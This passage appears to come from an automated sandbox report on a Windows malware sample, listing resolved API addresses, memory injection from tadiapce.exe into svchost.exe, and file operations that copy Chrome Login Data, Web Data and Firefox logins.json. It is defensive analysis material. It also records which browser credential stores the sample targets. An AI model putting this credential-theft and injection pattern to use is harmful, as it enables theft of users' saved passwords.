|
1 | |
| Get Handle | c:\windows\system32\crypt32.dll | base_address = 0x75610000 |
|
1 | |
| Get Handle | c:\program files\internet explorer\iexplore.exe | base_address = 0xc50000 |
|
1 | |
| Get Filename | api-ms-win-core-localization-l1-2-1 | process_name = c:\program files\internet explorer\iexplore.exe, file_name_orig = C:\Program Files\Internet Explorer\iexplore.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetExitCodeThread, address_out = 0x76b46ddd |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x76b5ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x76b633d3 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = Sleep, address_out = 0x76b5ba46 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThread, address_out = 0x76b6375d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x76b5ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetModuleHandleA, address_out = 0x76b5cf41 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileW, address_out = 0x76b5cc56 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x7738cd10 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteConsoleW, address_out = 0x76b582f1 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x76b6ed38 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x76b63d01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentProcess, address_out = 0x76b5cdcf |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76b52331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x76b676b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x76b5bb9f |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentProcessId, address_out = 0x76b5cac4 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentThreadId, address_out = 0x76b5bb80 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x76b62fde |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = InitializeSListHead, address_out = 0x77395eeb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x76b53ea8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetStartupInfoW, address_out = 0x76b63891 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetModuleHandleW, address_out = 0x76b6374d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = InterlockedExchange, address_out = 0x76b5bf0a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = VirtualFree, address_out = 0x76b61da4 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = VirtualAlloc, address_out = 0x76b62fb6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x76b6395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = VirtualProtectEx, address_out = 0x76b9f5d9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetModuleFileNameA, address_out = 0x76b633f6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = lstrcmpiA, address_out = 0x76b52249 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = HeapFree, address_out = 0x76b5bbd0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = HeapReAlloc, address_out = 0x7739ff51 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = HeapAlloc, address_out = 0x77382dd6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcessHeap, address_out = 0x76b61280 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = lstrcmpA, address_out = 0x76b48c59 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = lstrcpyA, address_out = 0x76b59793 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = HeapSize, address_out = 0x77389bec |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = InterlockedFlushSList, address_out = 0x77383129 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = RtlUnwind, address_out = 0x76b47f70 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x76b5bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetLastError, address_out = 0x76b5bb08 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EnterCriticalSection, address_out = 0x773777a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LeaveCriticalSection, address_out = 0x77377760 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77389ac5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x76b63939 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TlsAlloc, address_out = 0x76b635a1 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TlsGetValue, address_out = 0x76b5da70 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TlsSetValue, address_out = 0x76b5da88 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TlsFree, address_out = 0x76b613b8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FreeLibrary, address_out = 0x76b5d9d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryExW, address_out = 0x76b54775 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = RaiseException, address_out = 0x76b4eb60 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ExitProcess, address_out = 0x76b6214f |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetModuleHandleExW, address_out = 0x76b53e39 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x76b6452b |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WideCharToMultiByte, address_out = 0x76b6450e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LCMapStringW, address_out = 0x76b613d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76b60e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileExA, address_out = 0x76b9f3ef |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x76b5a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsValidCodePage, address_out = 0x76b6c1c0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetACP, address_out = 0x76b639aa |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetOEMCP, address_out = 0x76b53db9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCPInfo, address_out = 0x76b61e2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCommandLineA, address_out = 0x76b698ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCommandLineW, address_out = 0x76b6679e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x76b61dbc |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x76b61dc3 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetStdHandle, address_out = 0x76b61e46 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileType, address_out = 0x76b675a5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetStringTypeW, address_out = 0x76b667c8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetStdHandle, address_out = 0x76b9f589 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76b61400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlushFileBuffers, address_out = 0x76b47f81 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetConsoleCP, address_out = 0x76b62c8a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetConsoleMode, address_out = 0x76b62412 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointerEx, address_out = 0x76b4f5b2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAIoctl, address_out = 0x75a92fe7 |
|
1 | |
| Get Address | c:\windows\system32\shlwapi.dll | function = PathFindFileNameA, address_out = 0x771e00aa |
|
1 | |
| Get Address | c:\windows\system32\shlwapi.dll | function = StrChrA, address_out = 0x771dc5e6 |
|
1 | |
| Get Address | c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll | function = InitializeCriticalSectionEx, address_out = 0x0 |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x76b6418d |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x76b676e6 |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76b61e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LCMapStringEx, address_out = 0x76b9f72b |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = connect, address_out = 0x75a96bdd |
|
1 | |
| Get Address | c:\windows\system32\crypt32.dll | function = CertGetCertificateChain, address_out = 0x75626ccf |
|
1 | |
| Get Address | c:\windows\system32\crypt32.dll | function = CertVerifyCertificateChainPolicy, address_out = 0x7562cae2 |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-05-14 15:33:21 (UTC) |
|
1 | |
| Get Time | type = Performance Ctr, time = 26765669733 |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #38: svchost.exe
773
6
| Information | Value |
|---|---|
| ID | #38 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | svchost.exe |
| Initial Working Directory | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\ |
| Monitor | Start Time: 00:03:17, Reason: Child Process |
| Unmonitor | End Time: 00:04:16, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:59 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x6d8 |
| Parent PID | 0x214 (c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | ZGW5TDPU\2XC7u663GxWc |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
524
0x
154
0x
684
0x
788
0x
74C
0x
7D0
0x
D04
0x
DD8
0x
DC4
|
Injection Information
| Injection Type | Source Process | Source Os Thread ID | Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x50000, size = 367 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x60000, size = 112 |
|
62 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x602104, size = 12 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10000000, size = 1024 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10001000, size = 822784 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100ca000, size = 145920 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100ee000, size = 117248 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x1010e000, size = 512 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x1010f000, size = 1024 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10110000, size = 512 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10111000, size = 29696 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 26 |
|
3 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0xe0000, size = 12 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 19 |
|
6 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0xe0000, size = 16 |
|
57 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100ca088, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100ca08c, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 16 |
|
3 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100ca090, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 13 |
|
7 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100ca094, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 9 |
|
3 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100ca098, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 20 |
|
5 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100ca09c, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100ca0a0, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 15 |
|
3 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100ca0a4, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 18 |
|
3 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100ca0a8, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100ca0ac, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 21 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100ca0b0, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100ca0b4, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100ca0b8, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 12 |
|
10 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100ca0bc, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 22 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100ca0c0, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 14 |
|
4 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100ca0c4, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100ca0c8, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100ca0cc, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100ca0d0, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100ca0d4, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 10 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100ca0d8, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100ca0dc, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100ca0e0, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 11 |
|
3 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100ca0e4, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100ca0e8, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100ca0ec, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100ca0f0, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100ca0f4, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100ca0f8, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100ca0fc, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100ca100, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100ca104, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 24 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100ca108, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100ca10c, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100ca110, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100ca114, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100ca118, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100ca11c, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100ca120, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 17 |
|
3 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100ca124, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100ca128, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100ca12c, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100ca130, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100ca134, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100ca138, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100ca13c, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100ca140, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100ca144, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 25 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100ca148, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 28 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100ca14c, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100ca150, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100ca154, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100ca158, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100ca15c, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100ca160, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100ca164, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100ca168, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0xe0000, size = 1024 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x360000, size = 388 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x470000, size = 40 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0xe0000, size = 6 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x470000, size = 747 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x510000, size = 1024 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x520000, size = 128 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x540000, size = 44 |
|
1 |
Dropped Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Login Data.bak | 18.00 KB |
MD5:
89d7b9ad36ca7345933c7e369ba0a5f4
SHA1: 78f072d00227314570b0e0f721690856b4e2fb4f SHA256: 2ade5f90626dbc3bc778a35ce4b28b0dcb28f2852fbf7dcc15506e0501642f1a SSDeep: 24:LLilH0KL7G0TMJHUyyJtmCm0XKY6lOKQAE9V8MffD4fOzeCmly6UwcpYMQW:kz+JH3yJUheCVE9V8MX0PFlNU1uW |
|
|
| C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak | 64.00 KB |
MD5:
e3a002935a782f75c8ac7f3f0505d7f2
SHA1: 5ec603207a726efa249b6ef575b2d03c64e928fd SHA256: 912c041f1f45b8b817f94c84c15433a40463a8a56d6978cf08b7ed28996050a7 SSDeep: 96:Ze3Zht6YnMvqI738Hsa/NTIdEFaEdUDSuKn8Y/qBOnxjyWTJereWb3Ds4Blr:ZkZLHMEhTJMb3D |
|
|
Host Behavior
File (72)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Login Data.bak | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\Mozilla\Firefox\Profiles\azpxkq2q.default\logins.json | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Login Data.bak | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Login Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Web Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Login Data.bak | type = file_attributes |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Login Data.bak-journal | type = file_attributes |
|
2 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Login Data.bak-wal | type = file_attributes |
|
